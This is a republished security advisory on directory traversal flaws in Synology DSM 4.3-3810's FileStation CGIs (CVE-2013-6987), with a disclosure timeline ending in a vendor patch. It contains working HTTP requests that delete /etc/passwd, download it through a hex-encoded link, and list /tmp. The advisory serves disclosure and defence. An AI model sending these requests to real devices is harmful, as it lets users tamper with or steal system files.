Synology DSM 4.3-3810 - Directory Traversal

🗓️ 24 Dec 2013 00:00:00Reported by Andrea FabriziType

zdt🔗 0day.today👁 60 Views

Synology DSM 4.3-3810 - Directory Traversal, FileBrowser Components, Multiple Vulnerabilitie

Reporter	Title	Published	Views	Family All 11
CVE	CVE-2013-6987	31 Dec 201315:00	–	cve
Cvelist	CVE-2013-6987	31 Dec 201315:00	–	cvelist
NVD	CVE-2013-6987	31 Dec 201316:04	–	nvd
Packet Storm	Synology DSM 4.3-3810 Directory Traversal	23 Dec 201300:00	–	packetstorm
Prion	Directory traversal	31 Dec 201316:04	–	prion
Positive Technologies	PT-2013-6222 · Synology · Synology Diskstation Manager	31 Dec 201300:00	–	ptsecurity
securityvulns	CVE-2013-6955 Synology DSM remote code execution	27 Mar 201400:00	–	securityvulns
securityvulns	Synology DiskStation Manager code execution	27 Mar 201400:00	–	securityvulns
seebug.org	Synology DSM目录遍历漏洞	25 Dec 201300:00	–	seebug
Tenable Nessus	Synology DiskStation Manager < 4.3-3810 Update 3 Multiple FileBrowser Component Directory Traversal Vulnerabilities	5 Feb 201400:00	–	nessus

**************************************************************
Title: Synology DSM multiple directory traversal
Version affected: <= 4.3-3810
Vendor: Synology
Discovered by: Andrea Fabrizi
Email: [email protected]
Web: http://www.andreafabrizi.it
Twitter: @andreaf83
Status: patched
CVE: 2013-6987
**************************************************************
 
I'm again here with a Synology DSM vulnerability.
 
Synology DiskStation Manager (DSM) it's a Linux based operating
system, used for the DiskStation and RackStation products.
 
I found a lot of directory traversal in the FileBrowser components.
This kind of vulnerability allows any authenticated user, even if not
administrative, to access, create, delete, modify system and
configuration files.
 
The only countermeasure implemented against this vulnerability is the
check that the path starts with a valid shared folder, so is enough to
put the "../" straight after, to bypass the security check.
 
Vulnerables CGIs:
- /webapi/FileStation/html5_upload.cgi
- /webapi/FileStation/file_delete.cgi
- /webapi/FileStation/file_download.cgi
- /webapi/FileStation/file_sharing.cgi
- /webapi/FileStation/file_share.cgi
- /webapi/FileStation/file_MVCP.cgi
- /webapi/FileStation/file_rename.cgi
 
Not tested all the CGI, but I guess that many others are vulnerable,
so don't take my list as comprehensive.
 
Following some examples ("test" is a valid folder name):
 
- Delete /etc/passwd
===========================================
POST /webapi/FileStation/file_delete.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Content-Length: 103
Cookie: stay_login=0; id=kjuYI0HvD92m6
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
 
path=/test/../../etc/passwd&accurate_progress=true&api=SYNO.FileStation.Delete&method=start&version=1
===========================================
 
- Arbitrary file download:
===========================================
GET /fbdownload/?dlink=2f746573742f2e2e2f2e2e2f6574632f706173737764 HTTP/1.1
Host: 192.168.56.101:5000
Connection: keep-alive
Authorization: Basic XXXXXXXX
===========================================
 
2f746573742f2e2e2f2e2e2f6574632f706173737764 -> /test/../../etc/passwd
 
- Remote file list:
=========================
POST /webapi/FileStation/file_share.cgi HTTP/1.1
Host: 192.168.56.101:5000
X-SYNO-TOKEN: XXXXXXXX
Content-Length: 75
Cookie: stay_login=0; id=f9EThJSyRaqJM; BCSI-CS-36db57a1c38ce2f6=2
 
folder_path=/test/../../tmp&api=SYNO.FileStation.List&method=list&version=1
==========================
 
Timeline:
- 05/12/2013: First contact with the vendor
- 06/12/2013: Vulnerability details sent to the vendor
- 20/12/2013: Patch released by the vendor

#  0day.today [2018-03-14]  #

24 Dec 2013 00:00Current

6.5Medium risk

Vulners AI Score6.5

EPSS0.30235